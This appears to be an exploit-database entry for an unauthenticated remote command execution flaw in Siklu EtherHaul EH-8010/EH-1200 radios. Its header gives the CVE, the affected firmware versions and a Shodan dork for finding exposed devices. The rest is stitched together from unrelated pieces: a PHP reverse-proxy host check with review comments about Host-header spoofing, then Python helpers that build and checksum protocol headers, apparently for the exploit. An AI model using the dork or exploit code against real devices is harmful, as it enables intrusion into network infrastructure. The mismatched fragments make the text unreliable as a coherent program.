# Exploit Title: Siklu EtherHaul Series EH-8010 - Remote Command Execution
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57174
# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/
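$proxy_rs = $this -> proxy_filter();
// Allow-list of hosts permitted to front this application. The previous
// test `$proxy_rs != 'nowamagic.net' || $proxy_rs != 'blog.upx8.com'` was
// always true (no single value equals both hosts), so every request was
// rejected; compare against the list with a strict in_array() instead.
// NOTE(review): proxy_filter() returns $_SERVER['SERVER_NAME'], which on
// Apache with UseCanonicalName Off is taken from the client's Host header,
// so this is not a trustworthy reverse-proxy check on its own — confirm the
// front-end configuration before relying on it as an access control.
$allowed_hosts = array('nowamagic.net', 'blog.upx8.com');
if( !in_array($proxy_rs, $allowed_hosts, true) )
{
    echo '非法反向代理访问';
    //header('Location: http://blog.upx8.com/');
    exit;
}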
public function proxy_filter()
{
    // Identify the front-end by the server name PHP reports for this
    // request. An earlier variant that rebuilt the full request URL
    // (scheme, SERVER_NAME, PHP_SELF and QUERY_STRING) was retired; only
    // the host name is returned now.
    // NOTE(review): on Apache with UseCanonicalName Off, SERVER_NAME is
    // filled from the client-supplied Host header, so callers must not
    // treat this value as trusted — confirm the server configuration.
    $server_name = $_SERVER['SERVER_NAME'];
    return $server_name;
}
def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly ``n`` bytes from ``sock``.

    Loops over ``recv`` until the requested length is reached, so a
    short read never yields a truncated result.

    Args:
        sock: connected stream socket to read from.
        n: number of bytes to collect; 0 (or less) returns ``b''``
            without touching the socket.

    Returns:
        Exactly ``n`` bytes.

    Raises:
        ConnectionError: if the peer closes the connection (``recv``
            returns ``b''``) before ``n`` bytes have arrived.
    """
    pieces = []
    remaining = n
    while remaining > 0:
        piece = sock.recv(remaining)
        if not piece:
            raise ConnectionError('socket closed')
        pieces.append(piece)
        remaining -= len(piece)
    return b''.join(pieces)
def pad16_zero(b: bytes) -> bytes:
    """Right-pad ``b`` with NUL bytes up to the next multiple of 16.

    Input already on a 16-byte boundary (including empty input) is
    returned unchanged. This is plain zero padding, not PKCS#7, so the
    original length cannot be recovered from the result.

    Args:
        b: raw bytes to pad.

    Returns:
        ``b`` followed by 0-15 NUL bytes so that ``len(result) % 16 == 0``.
    """
    shortfall = (-len(b)) % 16
    if shortfall == 0:
        return b
    return b + bytes(shortfall)
def hdr_checksum(hdr: bytes) -> int:
    """Additive checksum over a header, skipping the checksum field itself.

    Sums the bytes at offsets 0x00-0x0B and 0x10-(HDR_LEN-1); the four
    bytes at 0x0C-0x0F are left out because ``build_header`` writes this
    value there. ``HDR_LEN`` is a module-level constant defined outside
    this block.

    Args:
        hdr: header buffer, normally ``HDR_LEN`` bytes long (shorter
            input is simply summed as far as it goes).

    Returns:
        The byte sum reduced modulo 2**32.
    """
    head = sum(hdr[:0x0C])
    tail = sum(hdr[0x10:HDR_LEN])
    return (head + tail) % (1 << 32)
def build_header(flag: int, msg: int, payload_len: int) -> bytes:
    """Assemble a ``HDR_LEN``-byte little-endian message header.

    Fields written here (every other byte stays zero):
      offset 0x00, 1 byte : low byte of ``flag``
      offset 0x01, 1 byte : low byte of ``msg``
      offset 0x08, 4 bytes: ``payload_len`` masked to 32 bits, ``<I``
      offset 0x0C, 4 bytes: ``hdr_checksum`` of the header, ``<I``

    ``HDR_LEN`` and ``hdr_checksum`` are module-level names defined
    outside this block.

    Args:
        flag: flag byte; only the low 8 bits are used.
        msg: message identifier byte; only the low 8 bits are used.
        payload_len: length of the payload that follows the header.

    Returns:
        An immutable ``bytes`` object of length ``HDR_LEN``.
    """
    buf = bytearray(HDR_LEN)
    # flag, msg, six reserved zero bytes, then the 32-bit payload length:
    # fills offsets 0x00-0x0B in one pack.
    struct.pack_into('<BB6xI', buf, 0x00,
                     flag & 0xFF, msg & 0xFF, payload_len & 0xFFFFFFFF)
    # The checksum is taken with its own field still zero, then stored;
    # hdr_checksum skips offsets 0x0C-0x0F so the two agree.
    checksum = hdr_checksum(buf)
    struct.pack_into('<I', buf, 0x0C, checksum)
    return bytes(buf)